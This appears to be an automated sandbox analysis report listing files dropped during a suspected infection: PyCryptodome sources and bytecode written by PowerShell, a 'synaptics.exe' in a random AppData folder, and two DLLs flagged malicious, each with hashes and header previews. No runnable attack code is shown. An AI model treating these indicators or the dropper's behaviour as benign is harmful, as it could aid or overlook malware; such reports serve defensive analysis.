                                                                                                                                                                                                            Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlgo: O
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7208
                                                                                                                                                                                                            Entropy (8bit):4.875780210138466
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dtFQHvov1zDH7zA3ZutH8MKD8LzmodYavD+U8FbPNapwDQVs3a:drQHvp42ME8H/d8RNuwk6a
                                                                                                                                                                                                            MD5:33552EE7C36C1E8B6AC76AAA51B18EA2
                                                                                                                                                                                                            SHA1:4B0476C73EFCA6264D64DEED3B2EC21F67B2FD82
                                                                                                                                                                                                            SHA-256:8BBD80ADF2035DED54365EB2076468D32E6BF9A5007C19557AFEAE19932A685F
                                                                                                                                                                                                            SHA-512:6AFE6599B48464CE0AEB8F29225A85EFE722C558E9F1F8EE30FD2EFB201FCC663F8E42355452D19AE905FDDB6A13C30E4FDBC57D17F94BDC118EBAAC90538A47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):706
                                                                                                                                                                                                            Entropy (8bit):4.785885591583499
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYB1mmN+1bgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEt:1REq7+1bspT3ENIAlUH8Myje+wqKozuP
                                                                                                                                                                                                            MD5:48B6BF106FC448220A97A73FBFA2425F
                                                                                                                                                                                                            SHA1:9899751126284AEC60B7D2C28047A93063B9CB20
                                                                                                                                                                                                            SHA-256:219BE400169E585320C518A50540EDA12E3C4F489322C42D56FDAD283D07A021
                                                                                                                                                                                                            SHA-512:D05EF3D93B5460A172FC3AB0E21B256CA3CE7BA3C7569E8074E01FDA2A7A309F63EEA6D7FB17D501DC77EC639C963B6D07A0EB0094A6DBF6C4645A30FB46D36E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Crypto.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6516
                                                                                                                                                                                                            Entropy (8bit):4.625878868247197
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:GFQHvo7H4sIR05Jox+lgRXv8NBgQ9Qb3B0NpLPpnhtV8:UQHvMKDRXUNBgHGjRhtV8
                                                                                                                                                                                                            MD5:35B1A807346DF9FAD49A2396E0E7C64E
                                                                                                                                                                                                            SHA1:9A46CF85539233672C3ED0D06E4F1EE5B53BFB27
                                                                                                                                                                                                            SHA-256:80A7769DE32A81B8FB8CBE362066FF80711D630C0BEB39235246E4FD53E11870
                                                                                                                                                                                                            SHA-512:DF42F3A86A75FA52B2005A493B3E48CBDC0972CD81811C70308CB80D7006CE88FD6E9AA3393D2C687855030EF17A2031F4C8D5371888944FE8F8F2AC439C45C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/Salsa20.py : Salsa20 stream cipher (http://cr.yp.to/snuffle.html)..#..# Contributed by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):770
                                                                                                                                                                                                            Entropy (8bit):4.753367031924495
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                                                                                            MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                                                                                            SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                                                                                            SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                                                                                            SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9216
                                                                                                                                                                                                            Entropy (8bit):4.936903488916336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Ke1DTDVPEdtwX76Yi7GVxoMk4s/Dj5jOrBrFVyBu/MmGffzHQfXd:z1HDVPEIOY4GVxHAJjOrBxAgMVn7MN
                                                                                                                                                                                                            MD5:7FA7E1751993203DDE56043015B96C52
                                                                                                                                                                                                            SHA1:D6B0DA2FB98EE6205A3D89F41D51E0B7939EE1A9
                                                                                                                                                                                                            SHA-256:7776497944B6A8F47620F4555316F42A6FA44D6FC0C6815654D081145B97E2C3
                                                                                                                                                                                                            SHA-512:9494E40692122D949D5DF9D5A100900427FF60259B6837942670AD857216F58AA1E2FD64723693809A8009D330E3BD0BC9A957B5C8B824E0AED1A8BE04D90CA9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X.Q.6.Q.6.Q.6.X..U.6...7.S.6...7.R.6.Q.7.p.6...3.Z.6...2.[.6...5.P.6..>.P.6..6.P.6....P.6..4.P.6.RichQ.6.................PE..L...^..f...........!................N........ ...............................`............@..........................$...... %..d....@.......................P..D.... ............................... ..@............ ..t............................text...S........................... ..`.rdata..z.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc..D....P......."..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5336
                                                                                                                                                                                                            Entropy (8bit):4.836111981939897
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MHDqrYJALrYJHdt3EHGuITiwnHav1ZaVDYyOKgiaiJrJtk3I99m2Ht3HRF29:0qrskrs9t3q/ITHSVNi1bk3ITm6tXRY9
                                                                                                                                                                                                            MD5:A5F07807C63A0A82CFE7F644D72C9F9D
                                                                                                                                                                                                            SHA1:4F44ED26FD9770A9B8ED279C9E75FFEB2C84B756
                                                                                                                                                                                                            SHA-256:26B7450998B5E04410A77486C695457C58DCBC8DB24F50CC685651D223F3BE8E
                                                                                                                                                                                                            SHA-512:535FDCFDDDF7D64D097B0B51F64EBD14D453895B167E379D105E15F8F9681100B324A02004A3DD059B599EF88C01B81E0AD5546E90F1251EA2172BA5DF6D9252
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2019, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):281
                                                                                                                                                                                                            Entropy (8bit):4.919666506917015
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:1REYBNHK+kb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQ+kzlbgHvIY3YyogmvNZRy/O
                                                                                                                                                                                                            MD5:4030500BC383DEE6F4BBDF228147813E
                                                                                                                                                                                                            SHA1:DE9B1C78DD481B3B42A29AB5485C2C1B3EDFF182
                                                                                                                                                                                                            SHA-256:4917140D2EAE01669B206BEAB2164796D2DF836CFBD8ACCC9189CF4E6EEBEDB2
                                                                                                                                                                                                            SHA-512:FCAE9156019C79B2033E53F4F0626FD729F8B99F6EB73C837330D5AE079F19CCBA33A7EB2C72CC3055C365B2ED272AFCD7313310A9C2F1120EA16FF0E7AFF63A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Iterable....from Crypto.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                            Entropy (8bit):5.336353049643416
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:z1WMVPEjHIDVhTQWejO2oWlq5or5YqTLTq3b5ZmMVn7gN3:xcojT4jltz5YOuHn7q3
                                                                                                                                                                                                            MD5:67EFF3114D1B45B18C87BD439311E993
                                                                                                                                                                                                            SHA1:73EA8F13AF119FB64A17CEE5798282A4815E7381
                                                                                                                                                                                                            SHA-256:DAB447710F7DD595C7311ED7921BA4B291666D7231118BC6B01A95D897A9A14B
                                                                                                                                                                                                            SHA-512:9DE9612BD80C8D3B2CD34B4695BF555B4B98020C4B64D581388AAD2EF1EB99140B0B37B784F8564BAD2032C275835C20F28E550DDF18D139D063EF87B0423501
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X.Q.6.Q.6.Q.6.X..U.6...7.S.6...7.R.6.Q.7.p.6...3.Z.6...2.[.6...5.P.6..>.P.6..6.P.6....P.6..4.P.6.RichQ.6.................PE..L..._..f...........!................N........0...............................p............@..........................4.......5..d....P.......................`..T....0...............................0..@............0..t............................text...%........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc..T....`.......*..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2923
                                                                                                                                                                                                            Entropy (8bit):4.69817669465711
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:AF/1FvgfQq1B5GIDvOQ+Tl+1+L+r+yC+3+/+TJ+F+3+OUZzHfJUPdD9Bd+uTV/H+:m1FvWQq1jGIDvOQgl2oIpCcI0JqYwBHZ
                                                                                                                                                                                                            MD5:C0765E2C315E8F9736A7AABD7C92E132
                                                                                                                                                                                                            SHA1:61E185BB15AE453031CE0DFC166A0FA05A8B2138
                                                                                                                                                                                                            SHA-256:5EE4031AEDAC195C6528FC9705C342286DF2D8018348EB0279C7148EA85E8830
                                                                                                                                                                                                            SHA-512:3EA5E75439A504FC0CAA8683E62C7D07BC57A46480D260EDE8D53E985B9084E55730D2C93F68612354E6253424BDD258D363559108ADE942E5C4A24318B64F76
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:#..# A block cipher is instantiated as a combination of:..# 1. A base cipher (such as AES)..# 2. A mode of operation (such as CBC)..#..# Both items are implemented as C modules...#..# The API of #1 is (replace "AES" with the name of the actual cipher):..# - AES_start_operaion(key) --> base_cipher_state..# - AES_encrypt(base_cipher_state, in, out, length)..# - AES_decrypt(base_cipher_state, in, out, length)..# - AES_stop_operation(base_cipher_state)..#..# Where base_cipher_state is AES_State, a struct with BlockBase (set of..# pointers to encrypt/decrypt/stop) followed by cipher-specific data...#..# The API of #2 is (replace "CBC" with the name of the actual mode):..# - CBC_start_operation(base_cipher_state) --> mode_state..# - CBC_encrypt(mode_state, in, out, length)..# - CBC_decrypt(mode_state, in, out, length)..# - CBC_stop_operation(mode_state)..#..# where mode_state is a a pointer to base_cipher_state plus mode-specific data.....import os....from Crypto.Cipher._mode_ecb import _cre
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7081
                                                                                                                                                                                                            Entropy (8bit):5.350916274998885
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:neGQHbITHl5m6xVZaGV/EXKauHuoDoft7TAUZmniQjzVHd2uP:ne7Hbk5nn9EXaHdItPdZ9QjVP
                                                                                                                                                                                                            MD5:11355E3466360173A628A9024E6F8484
                                                                                                                                                                                                            SHA1:B3C06BE97F4F8D26DCA69D4C0779D846F8FD601F
                                                                                                                                                                                                            SHA-256:FB6104ED144D247CEF0CD77B2A3EB7FF901EE10E43EBC83532114A06FF1D8F56
                                                                                                                                                                                                            SHA-512:46F27DDCEAB6616F0F555A87E21544EA7E111958B74283D9A70E9F9BADE8F3010C528351B3A5A8D28BB0E2959CA44B9DBD8017E33B53DE9BD98F99BB9F7FB6B4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.#.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e...Z.z.d.Z.e.....rQe.d.e...d.d.....Z.W.n...e.y[......Y.n.w.d.d...Z.d.d...Z.d.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_stop_operation(void *state);.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7055
                                                                                                                                                                                                            Entropy (8bit):5.347867103340184
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:oeGQHbITHl5m6xVZaGV/EXODiHu/Eoft7TAUZmniQjzVHd2qE5:oe7Hbk5nn9EXnHhItPdZ9QjI5
                                                                                                                                                                                                            MD5:91D8AC2106FE553FDEF387585A321124
                                                                                                                                                                                                            SHA1:88764EB03F9A6AFAB50217B023EDAE578B4AD58A
                                                                                                                                                                                                            SHA-256:E4D6459487203D168BB15FA62BCFDFE4748110C20A626E9E6DF0490B684AB29E
                                                                                                                                                                                                            SHA-512:49CB77F21170B35BC443A304A03BC3F03A43A521E6E4C411945FB0C66E027B138D65063E2E1E956C03CA2806DF4256A0799A1A14744B8F93E9DD501C29D710D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.#.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e...Z.z.d.Z.e.....rQe.d.e...d.d.....Z.W.n...e.y[......Y.n.w.d.d...Z.d.d...Z.d.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_stop_operation(void *state);.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5872
                                                                                                                                                                                                            Entropy (8bit):5.106264273963084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:QxeDVsus4bGQ/6VJPmmynGdtLAvEjIcfmlYmYw:5s4aEqPmmynGdtcAfgEw
                                                                                                                                                                                                            MD5:261376905054B85AF99E0B41E036FB04
                                                                                                                                                                                                            SHA1:83AE787A8C807783E50824A9BFAF495A936C5BDE
                                                                                                                                                                                                            SHA-256:7545DEB027FBBF17E09E91ABD5FBEBFA6B5B0C25C123179E963D1C1A4DEDC500
                                                                                                                                                                                                            SHA-512:81753E20586892431BD501D04F9BEE745F25845FBC689E60FC5945AC8F095D07303016EBB50D26CC5797F14B17D96BD7504E9FD089A8FD1D325D2D80D36B666F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.d...Z.d.S.).a.....Module's constants for the modes of operation supported with ARC2:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_arc2a?.... int ARC2_start_operation(const uint8_t key[],. size_t key_len,. size_t effective_key_len,.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                            Entropy (8bit):5.32677930945567
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6mjhv6kxRdRnkhxgMK2CrWVaonAYef2liLLR25jwXWObcbSkT6f0r1FbHE+wcJru:6mp6kvX0OTos4iLLIj5Obc2qpHM
                                                                                                                                                                                                            MD5:1556181ACCE7DA533B54D9FEF1AFBB2F
                                                                                                                                                                                                            SHA1:A55B2A72023405E63BCC330FDD177F544C25B811
                                                                                                                                                                                                            SHA-256:FD73C854DB4C17E6DDAE43F389CC74CC4E103F150E6C8B6CF0645CDCE86B6AC1
                                                                                                                                                                                                            SHA-512:82976AC2EB2972F6F6F28854B7EEC604AFCD0708506E850D9C1F6A8FDD1A4539EE258EF5AEF90C1782EAA52E7625F3DD9B98C1F516A948636702195AFAE1776F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.........................@...sV...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d...Z.d.d...Z.d.Z.e.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._ARC4al.... int ARC4_stream_encrypt(void *rc4State, const uint8_t in[],. uint8_t out[], size_t len);. int ARC4_stream_init(uint8_t *key, size_t keylen,. void **pRc4State);. int ARC4_stream_destroy(void *rc4State);. c....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...ARC4CipherzcARC4 cipher object. Do not create it directly. Use. :func:`Crypto.Cipher.ARC4.new` instead.. c....................O...s....t.|...d.k.r.|.d...}.|.d.d.....}.n.|...d.d...}.t.|...t.v.r%t.d.t.|.........t...|._.t...t.|...t.t.|.....|.j.......}.|.d.k.rCt.d.|.......t.|.j
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5011
                                                                                                                                                                                                            Entropy (8bit):5.215911906268307
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:KMIuzWfcCYS/Qi//MCQoDfmPtLAvE4/Hl29:o1G8J3d3DfmPtcft29
                                                                                                                                                                                                            MD5:412F47E3F0F8C814C6FE1737B744FBE7
                                                                                                                                                                                                            SHA1:ABF2A2A2837EA1AC0131EE551337942A8542AE4C
                                                                                                                                                                                                            SHA-256:BB08BB286AA36E5B007466B96090928EEA8570FD5896C2962C0B5BFC4195B5BB
                                                                                                                                                                                                            SHA-512:FCC12F1A681A836E223890411D972FFC21032723E4B7806C9DC2F753A9250F1CDE7159248D202AEF338D017DBB29CE031042C2F65BB426C993D0E5DF6503D44C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.........................@...s|...d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.d...Z.d.S.).a.....Module's constants for the modes of operation supported with Blowfish:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_blowfishaT.... int Blowfish_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int Blowfish_encrypt(const void *state,.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                                                            Entropy (8bit):5.162747279534722
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:YKBDp8EOtS/VG9UQ/XSxDrrzUFmz/tLAvE4IclIwy8:dZq8A9UEXSFrzUFmz/tcfbw8
                                                                                                                                                                                                            MD5:64644BDA6D6792415513CCEF69265D23
                                                                                                                                                                                                            SHA1:3E3C0FA6393627AF46AD85AA803E0D97C45A13A4
                                                                                                                                                                                                            SHA-256:B33E174360173318C835BCFBE7D71335B5409B3EECB2677E14A786E18F8B54E5
                                                                                                                                                                                                            SHA-512:D16896494D468EBF85AF71DBDE6262E4073092313CE7B484168E401C44B4096AE27AD38EB63FBD1FD7E0FB3BA1AB639FB87131E22FC160E3A32FCCD7D08ADBC2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
